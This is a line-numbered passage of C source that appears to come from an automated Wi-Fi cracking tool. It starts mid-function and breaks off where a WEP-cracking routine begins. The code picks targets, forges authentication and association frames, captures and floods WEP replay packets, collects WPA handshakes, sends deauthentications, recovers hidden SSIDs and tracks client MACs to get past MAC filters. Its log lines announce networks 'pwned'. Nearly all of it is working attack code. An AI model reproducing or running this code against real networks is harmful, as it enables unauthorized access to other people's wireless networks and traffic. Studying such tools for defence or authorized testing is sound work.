1189 if (n->n_crypto == CRYPTO_WPA) printf("*");
1190 }
1191 n = n->n_next;
1192 }
1193
1194 printf("]");
1195 }
1196
print_work(void)1197 static void print_work(void)
1198 {
1199 time_printf(V_NORMAL, "");
1200
1201 print_list("TO-OWN", check_ownable);
1202 print_list(" OWNED", check_owned);
1203 if (_conf.cf_verb > V_NORMAL) print_list(" UNREACH", check_unreach);
1204
1205 printf("\n");
1206
1207 save_log();
1208 }
1209
pwned(struct network * n)1210 static void pwned(struct network * n)
1211 {
1212 int s = (_state.s_now.tv_sec - n->n_start.tv_sec);
1213 int m = s / 60;
1214
1215 s -= m * 60;
1216
1217 time_printf(
1218 V_NORMAL, "Pwned network %s in %d:%.2d mins:sec\n", n->n_ssid, m, s);
1219
1220 n->n_astate = ASTATE_DONE;
1221
1222 print_work();
1223 }
1224
attack_get(void)1225 static struct network * attack_get(void)
1226 {
1227 struct network *n = _state.s_networks.n_next, *start;
1228
1229 if (_state.s_curnet && _state.s_curnet->n_next) n = _state.s_curnet->n_next;
1230
1231 start = n;
1232
1233 while (n)
1234 {
1235 if (should_attack(n)) return n;
1236
1237 n = n->n_next;
1238 if (n == NULL)
1239 {
1240 /* reached head, lets scan for a bit */
1241 if (_state.s_state == STATE_ATTACK) return NULL;
1242
1243 n = _state.s_networks.n_next;
1244 }
1245 if (n == start) break;
1246 }
1247
1248 return NULL;
1249 }
1250
attack_next(void)1251 static void attack_next(void)
1252 {
1253 struct network * n;
1254
1255 if ((n = attack_get()))
1256 {
1257 attack(n);
1258 return;
1259 }
1260
1261 if (_state.s_state == STATE_DONE) return;
1262
1263 /* we aint got people to pwn */
1264 if (_state.s_state == STATE_ATTACK) scan_start();
1265 }
1266
watchdog_next(struct network * n)1267 static int watchdog_next(struct network * n)
1268 {
1269 if (n->n_crypto == CRYPTO_WEP && n->n_astate == ASTATE_WEP_FLOOD
1270 && n->n_replay_got)
1271 {
1272 int diff;
1273 int to = _conf.cf_floodwait * 1000 * 1000;
1274
1275 diff = time_diff(&n->n_replay_last, &_state.s_now);
1276
1277 if (diff < to) return to - diff;
1278 }
1279
1280 return 0;
1281 }
1282
attack_watchdog(void * arg)1283 static void attack_watchdog(void * arg)
1284 {
1285 struct network * n = arg;
1286 int next;
1287
1288 if (_state.s_state != STATE_ATTACK || _state.s_curnet != n) return;
1289
1290 next = watchdog_next(n);
1291
1292 if (next <= 0 || next >= INT_MAX)
1293 {
1294 time_printf(V_VERBOSE, "Giving up on %s for now\n", n->n_ssid);
1295 attack_next();
1296 }
1297 else
1298 timer_in(next, attack_watchdog, n);
1299 }
1300
network_auth(void * a)1301 static void network_auth(void * a)
1302 {
1303 struct network * n = a;
1304
1305 if (_state.s_state != STATE_ATTACK || _state.s_curnet != n
1306 || n->n_wstate != WSTATE_NONE)
1307 return;
1308
1309 if (!have_mac(n)) return;
1310
1311 time_printf(V_VERBOSE, "Authenticating...\n");
1312
1313 send_auth(n);
1314
1315 timer_in(_conf.cf_to * 1000, network_auth, n);
1316 }
1317
do_assoc(struct network * n,int stype)1318 static void do_assoc(struct network * n, int stype)
1319 {
1320 unsigned char buf[2048];
1321 struct ieee80211_frame * wh = (struct ieee80211_frame *) buf;
1322 uint16_t * rc = (uint16_t *) (wh + 1);
1323 unsigned char * p;
1324
1325 fill_basic(n, wh);
1326 memcpy(wh->i_addr1, n->n_bssid, sizeof(wh->i_addr1));
1327 memcpy(wh->i_addr2, _state.s_mac, sizeof(wh->i_addr2));
1328 memcpy(wh->i_addr3, n->n_bssid, sizeof(wh->i_addr3));
1329
1330 wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT | stype;
1331
1332 *rc++ = htole16(IEEE80211_CAPINFO_ESS | IEEE80211_CAPINFO_PRIVACY
1333 | IEEE80211_CAPINFO_SHORT_PREAMBLE);
1334 *rc++ = htole16(0);
1335
1336 p = (unsigned char *) rc;
1337
1338 if (stype == IEEE80211_FC0_SUBTYPE_REASSOC_REQ)
1339 {
1340 memcpy(p, n->n_bssid, sizeof(n->n_bssid));
1341 p += sizeof(n->n_bssid);
1342 }
1343
1344 *p++ = IEEE80211_ELEMID_SSID;
1345 *p++ = strlen(n->n_ssid);
1346 memcpy(p, n->n_ssid, strlen(n->n_ssid));
1347 p += strlen(n->n_ssid);
1348
1349 // rates
1350 *p++ = IEEE80211_ELEMID_RATES;
1351 *p++ = 8;
1352 *p++ = 2 | 0x80;
1353 *p++ = 4 | 0x80;
1354 *p++ = 11 | 0x80;
1355 *p++ = 22 | 0x80;
1356 *p++ = 12 | 0x80;
1357 *p++ = 24 | 0x80;
1358 *p++ = 48 | 0x80;
1359 *p++ = 72;
1360
1361 /* x-rates */
1362 *p++ = IEEE80211_ELEMID_XRATES;
1363 *p++ = 4;
1364 *p++ = 48;
1365 *p++ = 72;
1366 *p++ = 96;
1367 *p++ = 108;
1368
1369 wifi_send(wh, (unsigned long) p - (unsigned long) wh);
1370 }
1371
network_assoc(void * a)1372 static void network_assoc(void * a)
1373 {
1374 struct network * n = a;
1375
1376 if (_state.s_state != STATE_ATTACK || _state.s_curnet != n
1377 || n->n_wstate != WSTATE_AUTH)
1378 return;
1379
1380 do_assoc(n, IEEE80211_FC0_SUBTYPE_ASSOC_REQ);
1381
1382 time_printf(V_VERBOSE, "Associating...\n");
1383
1384 timer_in(_conf.cf_to * 1000, network_assoc, n);
1385 }
1386
need_connect(struct network * n)1387 static int need_connect(struct network * n)
1388 {
1389 if (n->n_crypto == CRYPTO_WPA) return 0;
1390
1391 switch (n->n_astate)
1392 {
1393 case ASTATE_READY:
1394 case ASTATE_WEP_PRGA_GET:
1395 case ASTATE_WEP_FLOOD:
1396 return 1;
1397
1398 default:
1399 return 0;
1400 }
1401 }
1402
network_connect(struct network * n)1403 static int network_connect(struct network * n)
1404 {
1405 switch (n->n_wstate)
1406 {
1407 case WSTATE_NONE:
1408 network_auth(n);
1409 break;
1410
1411 case WSTATE_AUTH:
1412 network_assoc(n);
1413 break;
1414
1415 case WSTATE_ASSOC:
1416 return 1;
1417 }
1418
1419 return 0;
1420 }
1421
prga_get(struct network * n)1422 static void prga_get(struct network * n)
1423 {
1424 if (n->n_replay_len)
1425 {
1426 n->n_astate = ASTATE_WEP_FLOOD;
1427 attack_continue(n);
1428 return;
1429 }
1430 }
1431
speed_add(struct speed * s)1432 static void speed_add(struct speed * s)
1433 {
1434 if (s->s_start.tv_sec == 0)
1435 memcpy(&s->s_start, &_state.s_now, sizeof(s->s_start));
1436
1437 s->s_num++;
1438 }
1439
speed_calculate(struct speed * s)1440 static void speed_calculate(struct speed * s)
1441 {
1442 int diff = time_diff(&s->s_start, &_state.s_now);
1443
1444 if (diff < (1000 * 1000)) return;
1445
1446 s->s_speed = (int) ((double) s->s_num / ((double) diff / 1000.0 / 1000.0));
1447
1448 memcpy(&s->s_start, &_state.s_now, sizeof(s->s_start));
1449 s->s_num = 0;
1450 }
1451
do_flood(struct network * n)1452 static void do_flood(struct network * n)
1453 {
1454 struct ieee80211_frame * wh = (struct ieee80211_frame *) n->n_replay;
1455
1456 if (!network_connect(n)) return;
1457
1458 memcpy(wh->i_addr2, _state.s_mac, sizeof(wh->i_addr2));
1459
1460 wifi_send(n->n_replay, n->n_replay_len);
1461 speed_add(&n->n_flood_out);
1462 }
1463
wep_flood(void * a)1464 static void wep_flood(void * a)
1465 {
1466 struct network * n = a;
1467
1468 if (_state.s_state != STATE_ATTACK || _state.s_curnet != n
1469 || n->n_astate != ASTATE_WEP_FLOOD)
1470 return;
1471
1472 do_flood(n);
1473
1474 timer_in(_conf.cf_floodfreq, wep_flood, n);
1475 }
1476
replay_check(void * a)1477 static void replay_check(void * a)
1478 {
1479 struct network * n = a;
1480
1481 if (_state.s_state != STATE_ATTACK || _state.s_curnet != n
1482 || n->n_astate != ASTATE_WEP_FLOOD)
1483 return;
1484
1485 if (n->n_replay_got > 3) return;
1486
1487 n->n_replay_len = 0;
1488 n->n_astate = ASTATE_WEP_PRGA_GET;
1489 }
1490
start_flood(struct network * n)1491 static void start_flood(struct network * n)
1492 {
1493 n->n_replay_got = 0; /* refresh replay packet if it sucks */
1494
1495 timer_in(5 * 1000 * 1000, replay_check, n);
1496 wep_flood(n);
1497 }
1498
attack_wep(struct network * n)1499 static void attack_wep(struct network * n)
1500 {
1501 if (!n->n_ssid[0])
1502 {
1503 n->n_astate = ASTATE_DEAUTH;
1504 deauth(n);
1505 return;
1506 }
1507
1508 if (!network_connect(n)) return;
1509
1510 switch (n->n_astate)
1511 {
1512 case ASTATE_READY:
1513 n->n_astate = ASTATE_WEP_PRGA_GET;
1514 /* fallthrough */
1515 case ASTATE_WEP_PRGA_GET:
1516 prga_get(n);
1517 break;
1518
1519 case ASTATE_WEP_FLOOD:
1520 start_flood(n);
1521 break;
1522 }
1523 }
1524
attack_continue(struct network * n)1525 static void attack_continue(struct network * n)
1526 {
1527 if (_state.s_state != STATE_ATTACK || _state.s_curnet != n) return;
1528
1529 switch (n->n_astate)
1530 {
1531 case ASTATE_NONE:
1532 n->n_astate = ASTATE_PING;
1533 /* fall through */
1534 case ASTATE_PING:
1535 n->n_ping_got = n->n_ping_sent = 0;
1536 attack_ping(n);
1537 return;
1538
1539 case ASTATE_DONE:
1540 pwned(n);
1541 /* fallthrough */
1542 case ASTATE_UNREACH:
1543 if (_conf.cf_bssid)
1544 _state.s_state = STATE_DONE;
1545 else
1546 attack_next();
1547 return;
1548 }
1549
1550 switch (n->n_crypto)
1551 {
1552 case CRYPTO_WPA:
1553 attack_wpa(n);
1554 break;
1555
1556 case CRYPTO_WEP:
1557 attack_wep(n);
1558 break;
1559 }
1560 }
1561
attack(struct network * n)1562 static void attack(struct network * n)
1563 {
1564 _state.s_curnet = n;
1565 _state.s_state = STATE_ATTACK;
1566
1567 channel_set(n->n_chan);
1568
1569 time_printf(V_VERBOSE, "Pwning [%s] %s\n", n->n_ssid, mac2str(n->n_bssid));
1570
1571 if (n->n_start.tv_sec == 0)
1572 memcpy(&n->n_start, &_state.s_now, sizeof(n->n_start));
1573
1574 if (!_conf.cf_bssid)
1575 timer_in(_conf.cf_attackwait * 1000 * 1000, attack_watchdog, n);
1576
1577 n->n_attempts++;
1578
1579 attack_continue(n);
1580 }
1581
found_new_client(struct network * n,struct client * c)1582 static void found_new_client(struct network * n, struct client * c)
1583 {
1584 time_printf(V_VERBOSE,
1585 "Found client for network [%s] %s\n",
1586 n->n_ssid,
1587 mac2str(c->c_mac));
1588
1589 if (n->n_mac_filter && !n->n_client_mac) attack_continue(n);
1590 }
1591
found_new_network(struct network * n)1592 static void found_new_network(struct network * n)
1593 {
1594 struct client * c = n->n_clients.c_next;
1595
1596 network_print(n);
1597
1598 while (c)
1599 {
1600 found_new_client(n, c);
1601 c = c->c_next;
1602 }
1603
1604 if (_conf.cf_bssid
1605 && memcmp(n->n_bssid, _conf.cf_bssid, sizeof(n->n_bssid)) == 0)
1606 {
1607 if (should_attack(n))
1608 {
1609 attack(n);
1610 }
1611 else
1612 {
1613 time_printf(V_NORMAL, "Can't attack %s\n", n->n_ssid);
1614 _state.s_state = STATE_DONE;
1615 }
1616 }
1617 }
1618
packet_copy(struct packet * p,void * d,int len)1619 static void packet_copy(struct packet * p, void * d, int len)
1620 {
1621 assert(len <= (int) sizeof(p->p_data));
1622
1623 p->p_len = len;
1624 memcpy(p->p_data, d, len);
1625 }
1626
1627 static void packet_write_pcap(int fd, struct packet * p);
1628
found_ssid(struct network * n)1629 static void found_ssid(struct network * n)
1630 {
1631 unsigned char * p;
1632 int ssidlen;
1633 int origlen;
1634
1635 time_printf(
1636 V_NORMAL, "Found SSID [%s] for %s\n", n->n_ssid, mac2str(n->n_bssid));
1637
1638 /* beacon surgery */
1639 p = n->n_beacon.p_data + sizeof(struct ieee80211_frame) + 8 + 2 + 2;
1640
1641 ssidlen = strlen(n->n_ssid);
1642 assert((n->n_beacon.p_len + ssidlen) <= (int) sizeof(n->n_beacon.p_data));
1643
1644 assert(*p == IEEE80211_ELEMID_SSID);
1645 p++;
1646
1647 origlen = *p;
1648 *p++ = ssidlen;
1649
1650 assert(origlen == 0 || p[0] == 0);
1651
1652 memmove(p + ssidlen,
1653 p + origlen,
1654 n->n_beacon.p_len - (p + origlen - n->n_beacon.p_data));
1655 memcpy(p, n->n_ssid, ssidlen);
1656
1657 n->n_beacon.p_len += ssidlen - origlen;
1658
1659 if (n->n_client_handshake)
1660 {
1661 n->n_astate = ASTATE_WPA_CRACK;
1662 attack_continue(n);
1663 }
1664
1665 if (n->n_crypto == CRYPTO_WEP)
1666 {
1667 n->n_astate = ASTATE_READY;
1668 attack_continue(n);
1669 }
1670 }
1671
parse_rsn(struct network * n,unsigned char * p,int l,int rsn)1672 static int parse_rsn(struct network * n, unsigned char * p, int l, int rsn)
1673 {
1674 int c;
1675 unsigned char * start = p;
1676 int psk = 0;
1677
1678 if (l < 2 || l >= INT_MAX) return 0;
1679
1680 if (memcmp(p, "\x01\x00", 2) != 0) return 0;
1681
1682 n->n_crypto = CRYPTO_WPA;
1683
1684 if (l < 8) return -1;
1685
1686 p += 2;
1687 p += 4;
1688
1689 /* cipher */
1690 c = le16toh(*((uint16_t *) p));
1691
1692 p += 2 + 4 * c;
1693
1694 if (l < ((p - start) + 2)) return -1;
1695
1696 /* auth */
1697 c = le16toh(*((uint16_t *) p));
1698 p += 2;
1699
1700 if (l < ((p - start) + c * 4)) return -1;
1701
1702 while (c--)
1703 {
1704 if (rsn && memcmp(p, "\x00\x0f\xac\x02", 4) == 0) psk = 1;
1705
1706 if (!rsn && memcmp(p, "\x00\x50\xf2\x02", 4) == 0) psk = 1;
1707
1708 p += 4;
1709 }
1710
1711 assert(l >= (p - start));
1712
1713 if (!psk) n->n_crypto = CRYPTO_WPA_MGT;
1714
1715 return 0;
1716 }
1717
parse_elem_vendor(struct network * n,unsigned char * e,int l)1718 static int parse_elem_vendor(struct network * n, unsigned char * e, int l)
1719 {
1720 struct ieee80211_ie_wpa * wpa = (struct ieee80211_ie_wpa *) e;
1721
1722 if (l < 5) return 0;
1723
1724 if (memcmp(wpa->wpa_oui, "\x00\x50\xf2", 3) != 0) return 0;
1725
1726 if (l < 8) return 0;
1727
1728 if (wpa->wpa_type != WPA_OUI_TYPE) return 0;
1729
1730 return parse_rsn(n, (unsigned char *) &wpa->wpa_version, l - 6, 0);
1731 }
1732
1733 static void
wifi_beacon(struct network * n,struct ieee80211_frame * wh,int totlen)1734 wifi_beacon(struct network * n, struct ieee80211_frame * wh, int totlen)
1735 {
1736 unsigned char * p = (unsigned char *) (wh + 1);
1737 int bhlen = 8 + 2 + 2;
1738 int new = 0;
1739 int len = totlen;
1740 int hidden = 0;
1741 int ssids = 0;
1742
1743 totlen -= sizeof(*wh);
1744
1745 if (totlen < bhlen) goto __bad;
1746
1747 if (!(IEEE80211_BEACON_CAPABILITY(p) & IEEE80211_CAPINFO_PRIVACY)) return;
1748
1749 if (!n->n_have_beacon) new = 1;
1750
1751 n->n_have_beacon = 1;
1752 n->n_crypto = CRYPTO_WEP;
1753 n->n_dbm = _state.s_ri->ri_power;
1754
1755 p += bhlen;
1756 totlen -= bhlen;
1757
1758 while (totlen > 2)
1759 {
1760 int id = *p++;
1761 int l = *p++;
1762
1763 totlen -= 2;
1764
1765 if (totlen < l) goto __bad;
1766
1767 switch (id)
1768 {
1769 case IEEE80211_ELEMID_SSID:
1770 if (++ssids > 1) break;
1771
1772 if (l == 0 || p[0] == 0)
1773 hidden = 1;
1774 else
1775 {
1776 memcpy(n->n_ssid, p, l);
1777 n->n_ssid[l] = 0;
1778 }
1779 break;
1780
1781 case IEEE80211_ELEMID_DSPARMS:
1782 n->n_chan = *p;
1783 break;
1784
1785 case IEEE80211_ELEMID_VENDOR:
1786 if (parse_elem_vendor(n, &p[-2], l + 2) == -1) goto __bad;
1787 break;
1788
1789 case IEEE80211_ELEMID_RSN:
1790 if (parse_rsn(n, p, l, 1) == -1) goto __bad;
1791 break;
1792
1793 default:
1794 // printf("id %d len %d\n", id, l);
1795 break;
1796 }
1797
1798 p += l;
1799 totlen -= l;
1800 }
1801
1802 if (new)
1803 {
1804 packet_copy(&n->n_beacon, wh, len);
1805 found_new_network(n);
1806
1807 if (hidden && n->n_ssid[0]) found_ssid(n);
1808
1809 if (ssids > 1 && should_attack(n))
1810 {
1811 time_printf(V_NORMAL,
1812 "WARNING: unsupported multiple SSIDs"
1813 " for network %s [%s]\n",
1814 mac2str(n->n_bssid),
1815 n->n_ssid);
1816 }
1817 }
1818
1819 return;
1820 __bad:
1821 printf("\nBad beacon\n");
1822 }
1823
for_us(struct ieee80211_frame * wh)1824 static int for_us(struct ieee80211_frame * wh)
1825 {
1826 return memcmp(wh->i_addr1, _state.s_mac, sizeof(wh->i_addr1)) == 0;
1827 }
1828
has_mac_filter(struct network * n)1829 static void has_mac_filter(struct network * n)
1830 {
1831 time_printf(V_VERBOSE, "MAC address filter on %s\n", n->n_ssid);
1832 n->n_mac_filter = 1;
1833 }
1834
wifi_auth(struct network * n,struct ieee80211_frame * wh,int len)1835 static void wifi_auth(struct network * n, struct ieee80211_frame * wh, int len)
1836 {
1837 uint16_t * p = (uint16_t *) (wh + 1);
1838 int rc;
1839
1840 if (len < (int) (sizeof(*wh) + 2 + 2 + 2)) goto __bad;
1841
1842 rc = le16toh(p[2]);
1843
1844 if (for_us(wh) && rc != 0)
1845 {
1846 if (!n->n_mac_filter) has_mac_filter(n);
1847 }
1848
1849 if (for_us(wh) && n->n_astate == ASTATE_PING)
1850 {
1851 ping_reply(n, wh);
1852 return;
1853 }
1854
1855 if (for_us(wh) && n->n_wstate == ASTATE_NONE && need_connect(n))
1856 {
1857 if (le16toh(p[0]) != 0 || le16toh(p[1]) != 2) return;
1858
1859 if (le16toh(p[2]) == 0)
1860 {
1861 n->n_wstate = WSTATE_AUTH;
1862 time_printf(V_VERBOSE, "Authenticated\n");
1863 network_connect(n);
1864 }
1865 }
1866
1867 return;
1868 __bad:
1869 printf("Bad auth\n");
1870 }
1871
found_mac(struct network * n)1872 static void found_mac(struct network * n)
1873 {
1874 if (!n->n_mac_filter || n->n_got_mac) return;
1875
1876 assert(n->n_client_mac);
1877
1878 time_printf(V_NORMAL,
1879 "Found MAC %s for %s\n",
1880 mac2str(n->n_client_mac->c_mac),
1881 n->n_ssid);
1882
1883 n->n_got_mac = 1;
1884 }
1885
1886 static void
wifi_assoc_resp(struct network * n,struct ieee80211_frame * wh,int len)1887 wifi_assoc_resp(struct network * n, struct ieee80211_frame * wh, int len)
1888 {
1889 uint16_t * p = (uint16_t *) (wh + 1);
1890
1891 if (len < (int) (sizeof(*wh) + 2 + 2 + 2)) goto __bad;
1892
1893 if (for_us(wh) && n->n_wstate == WSTATE_AUTH)
1894 {
1895 if (le16toh(p[1]) == 0)
1896 {
1897 int aid = le16toh(p[2]) & 0x3FFF;
1898
1899 n->n_wstate = WSTATE_ASSOC;
1900 time_printf(
1901 V_NORMAL, "Associated to %s AID [%d]\n", n->n_ssid, aid);
1902
1903 found_mac(n);
1904
1905 attack_continue(n);
1906 }
1907 else
1908 time_printf(V_NORMAL, "Assoc died %d\n", le16toh(p[1]));
1909 }
1910
1911 return;
1912 __bad:
1913 printf("Bad assoc resp\n");
1914 }
1915
grab_hidden_ssid(struct network * n,struct ieee80211_frame * wh,int len,int off)1916 static void grab_hidden_ssid(struct network * n,
1917 struct ieee80211_frame * wh,
1918 int len,
1919 int off)
1920 {
1921 unsigned char * p = ((unsigned char *) (wh + 1)) + off;
1922 int l;
1923
1924 if (n->n_ssid[0]) return;
1925
1926 len -= sizeof(*wh) + off + 2;
1927
1928 if (len < 0) goto __bad;
1929
1930 if (*p++ != IEEE80211_ELEMID_SSID) goto __bad;
1931
1932 l = *p++;
1933 if (l > len) goto __bad;
1934
1935 if (l == 0) return;
1936
1937 memcpy(n->n_ssid, p, l);
1938 n->n_ssid[l] = 0;
1939
1940 if (!n->n_have_beacon) return;
1941
1942 found_ssid(n);
1943 return;
1944 __bad:
1945 printf("\nbad grab_hidden_ssid\n");
1946 return;
1947 }
1948
wifi_mgt(struct network * n,struct ieee80211_frame * wh,int len)1949 static void wifi_mgt(struct network * n, struct ieee80211_frame * wh, int len)
1950 {
1951 switch (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK)
1952 {
1953 case IEEE80211_FC0_SUBTYPE_BEACON:
1954 wifi_beacon(n, wh, len);
1955 break;
1956
1957 case IEEE80211_FC0_SUBTYPE_AUTH:
1958 wifi_auth(n, wh, len);
1959 break;
1960
1961 case IEEE80211_FC0_SUBTYPE_ASSOC_RESP:
1962 wifi_assoc_resp(n, wh, len);
1963 break;
1964
1965 case IEEE80211_FC0_SUBTYPE_DEAUTH:
1966 if (for_us(wh) && need_connect(n))
1967 {
1968 time_printf(V_VERBOSE, "Got deauth for %s\n", n->n_ssid);
1969 n->n_wstate = WSTATE_NONE;
1970 network_connect(n);
1971 }
1972 break;
1973
1974 case IEEE80211_FC0_SUBTYPE_ASSOC_REQ:
1975 grab_hidden_ssid(n, wh, len, 2 + 2);
1976 break;
1977
1978 case IEEE80211_FC0_SUBTYPE_REASSOC_REQ:
1979 grab_hidden_ssid(n, wh, len, 2 + 2 + 6);
1980 break;
1981
1982 case IEEE80211_FC0_SUBTYPE_PROBE_RESP:
1983 grab_hidden_ssid(n, wh, len, 8 + 2 + 2);
1984 break;
1985
1986 default:
1987 if (for_us(wh))
1988 {
1989 printf("UNHANDLED MGMT %d\n",
1990 (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK)
1991 >> IEEE80211_FC0_SUBTYPE_SHIFT);
1992 }
1993 break;
1994 }
1995 }
1996
wifi_ctl(struct ieee80211_frame * wh,int len)1997 static void wifi_ctl(struct ieee80211_frame * wh, int len)
1998 {
1999 // printf("ctl\n");
2000
2001 if (wh && len)
2002 {
2003 }
2004 }
2005
get_client_mac(struct ieee80211_frame * wh)2006 static unsigned char * get_client_mac(struct ieee80211_frame * wh)
2007 {
2008 unsigned char * bssid = get_bssid(wh);
2009 int type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK;
2010
2011 if (type == IEEE80211_FC0_TYPE_CTL) return NULL;
2012
2013 if (!bssid) return wh->i_addr2;
2014
2015 if (bssid == wh->i_addr1)
2016 return wh->i_addr2;
2017 else
2018 return wh->i_addr1;
2019 }
2020
client_get(struct network * n,struct ieee80211_frame * wh)2021 static struct client * client_get(struct network * n,
2022 struct ieee80211_frame * wh)
2023 {
2024 struct client * c = n->n_clients.c_next;
2025 unsigned char * cmac = get_client_mac(wh);
2026
2027 if (!cmac) return NULL;
2028
2029 while (c)
2030 {
2031 if (memcmp(c->c_mac, cmac, 6) == 0) return c;
2032
2033 c = c->c_next;
2034 }
2035
2036 return NULL;
2037 }
2038
client_update(struct network * n,struct ieee80211_frame * wh)2039 static struct client * client_update(struct network * n,
2040 struct ieee80211_frame * wh)
2041 {
2042 unsigned char * cmac = get_client_mac(wh);
2043 struct client * c;
2044 int type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK;
2045
2046 if (!cmac) return NULL;
2047
2048 /* let's not pwn ourselves */
2049 if (memcmp(cmac, _state.s_mac, sizeof(_state.s_mac)) == 0) return NULL;
2050
2051 if (cmac == wh->i_addr1)
2052 {
2053 if (memcmp(cmac, BROADCAST, 6) == 0) return NULL;
2054
2055 /* multicast */
2056 if (memcmp(cmac, "\x01\x00\x5e", 3) == 0) return NULL;
2057
2058 /* ipv6 multicast */
2059 if (memcmp(cmac, "\x33\x33", 2) == 0) return NULL;
2060
2061 /* MAC PAUSE */
2062 if (memcmp(cmac, "\x01\x80\xC2", 3) == 0) return NULL;
2063
2064 /* fuck it */
2065 if (cmac[0] == 0x01) return NULL;
2066 }
2067
2068 /* here we can choose how conservative to be */
2069 if (type == IEEE80211_FC0_TYPE_MGT)
2070 {
2071 switch (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK)
2072 {
2073 case IEEE80211_FC0_SUBTYPE_ASSOC_RESP:
2074 break;
2075
2076 case IEEE80211_FC0_SUBTYPE_PROBE_RESP:
2077 default:
2078 return NULL;
2079 }
2080 }
2081
2082 c = client_get(n, wh);
2083 if (!c)
2084 {
2085 c = xmalloc(sizeof(*c));
2086
2087 memset(c, 0, sizeof(*c));
2088
2089 memcpy(c->c_mac, cmac, sizeof(c->c_mac));
2090 c->c_next = n->n_clients.c_next;
2091 n->n_clients.c_next = c;
2092
2093 if (n->n_have_beacon
2094 && (n->n_crypto == CRYPTO_WPA || n->n_crypto == CRYPTO_WEP))
2095 found_new_client(n, c);
2096 }
2097
2098 return c;
2099 }
2100
eapol_handshake_step(unsigned char * eapol,int len)2101 static int eapol_handshake_step(unsigned char * eapol, int len)
2102 {
2103 int eapol_size = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8 + 16 + 2;
2104
2105 if (len < eapol_size) return 0;
2106
2107 /* not pairwise */
2108 if ((eapol[6] & 0x08) == 0) return 0;
2109
2110 /* 1: has no mic */
2111 if ((eapol[5] & 1) == 0) return 1;
2112
2113 /* 3: has ack */
2114 if ((eapol[6] & 0x80) != 0) return 3;
2115
2116 if (*((uint16_t *) &eapol[eapol_size - 2]) == 0) return 4;
2117
2118 return 2;
2119 }
2120
process_eapol(struct network * n,struct client * c,unsigned char * p,int len,struct ieee80211_frame * wh,int totlen)2121 static void process_eapol(struct network * n,
2122 struct client * c,
2123 unsigned char * p,
2124 int len,
2125 struct ieee80211_frame * wh,
2126 int totlen)
2127 {
2128 int num, i;
2129
2130 if (n->n_client_handshake) return;
2131
2132 num = eapol_handshake_step(p, len);
2133 if (num == 0) return;
2134
2135 /* reset... should use time, too. XXX conservative - check retry */
2136 if (c->c_wpa == 0 || num <= c->c_wpa)
2137 {
2138 for (i = 0; i < 4; i++) c->c_handshake[i].p_len = 0;
2139
2140 c->c_wpa_got = 0;
2141 }
2142
2143 c->c_wpa = num;
2144
2145 switch (num)
2146 {
2147 case 1:
2148 c->c_wpa_got |= 1;
2149 break;
2150
2151 case 2:
2152 c->c_wpa_got |= 2;
2153 c->c_wpa_got |= 4;
2154 break;
2155
2156 case 3:
2157 if (memcmp(&p[17], ZERO, 32) != 0) c->c_wpa_got |= 1;
2158
2159 c->c_wpa_got |= 4;
2160 break;
2161
2162 case 4:
2163 if (memcmp(&p[17], ZERO, 32) != 0) c->c_wpa_got |= 2;
2164
2165 c->c_wpa_got |= 4;
2166 break;
2167
2168 default:
2169 abort();
2170 }
2171
2172 packet_copy(&c->c_handshake[num - 1], wh, totlen);
2173
2174 time_printf(V_VERBOSE,
2175 "Got WPA handshake step %d (have %d) for %s\n",
2176 num,
2177 c->c_wpa_got,
2178 n->n_ssid);
2179
2180 if (c->c_wpa_got == 7)
2181 {
2182 n->n_client_handshake = c;
2183
2184 time_printf(
2185 V_NORMAL, "Got necessary WPA handshake info for %s\n", n->n_ssid);
2186
2187 n->n_client_mac = c;
2188 found_mac(n);
2189
2190 if (n->n_ssid[0])
2191 {
2192 n->n_astate = ASTATE_WPA_CRACK;
2193 attack_continue(n);
2194 }
2195 }
2196 }
2197
is_replayable(struct ieee80211_frame * wh,int len)2198 static int is_replayable(struct ieee80211_frame * wh, int len)
2199 {
2200 unsigned char clear[2048];
2201 int dlen = len - 4 - 4;
2202 int clearsize;
2203 int weight[16];
2204
2205 known_clear(clear, &clearsize, weight, (void *) wh, dlen);
2206 if (clearsize < 16) return 0;
2207
2208 return 1;
2209 }
2210
get_replayable(struct network * n,struct ieee80211_frame * wh,unsigned char * body,int len)2211 static void get_replayable(struct network * n,
2212 struct ieee80211_frame * wh,
2213 unsigned char * body,
2214 int len)
2215 {
2216 if (!is_replayable(wh, len)) return;
2217
2218 if (n->n_replay_len) return;
2219
2220 n->n_replay_got = 0;
2221
2222 assert(len + sizeof(*wh) <= (int) sizeof(n->n_replay));
2223
2224 memcpy(&n->n_replay[sizeof(*wh)], body, len);
2225 n->n_replay_len = len + sizeof(*wh);
2226
2227 wh = (struct ieee80211_frame *) n->n_replay;
2228 fill_basic(n, wh);
2229 memcpy(wh->i_addr1, n->n_bssid, sizeof(wh->i_addr1));
2230 memcpy(wh->i_addr2, _state.s_mac, sizeof(wh->i_addr3));
2231 memcpy(wh->i_addr3, BROADCAST, sizeof(wh->i_addr3));
2232
2233 wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA | IEEE80211_FC0_SUBTYPE_DATA;
2234 wh->i_fc[1] |= IEEE80211_FC1_DIR_TODS | IEEE80211_FC1_WEP;
2235
2236 time_printf(V_NORMAL,
2237 "Got replayable packet for %s [len %d]\n",
2238 n->n_ssid,
2239 len - 4 - 4);
2240
2241 if (_state.s_state == STATE_ATTACK && _state.s_curnet == n
2242 && n->n_astate == ASTATE_WEP_PRGA_GET)
2243 attack_continue(n);
2244 }
2245
2246 static void
check_replay(struct network * n,struct ieee80211_frame * wh,int len)2247 check_replay(struct network * n, struct ieee80211_frame * wh, int len)
2248 {
2249 if (_state.s_state != STATE_ATTACK || _state.s_curnet != n
2250 || n->n_astate != ASTATE_WEP_FLOOD)
2251 return;
2252
2253 if (!(wh->i_fc[1] |= IEEE80211_FC1_DIR_FROMDS)) return;
2254
2255 if (memcmp(wh->i_addr3, _state.s_mac, sizeof(wh->i_addr3)) != 0) return;
2256
2257 if (len != (int) (n->n_replay_len - sizeof(*wh))) return;
2258
2259 n->n_replay_got++;
2260 memcpy(&n->n_replay_last, &_state.s_now, sizeof(n->n_replay_last));
2261
2262 // ack clocked
2263 do_flood(n);
2264 }
2265
2266 static void
do_wep_crack(struct cracker * c,struct network * n,int len,int limit)2267 do_wep_crack(struct cracker * c, struct network * n, int len, int limit)
2268 {
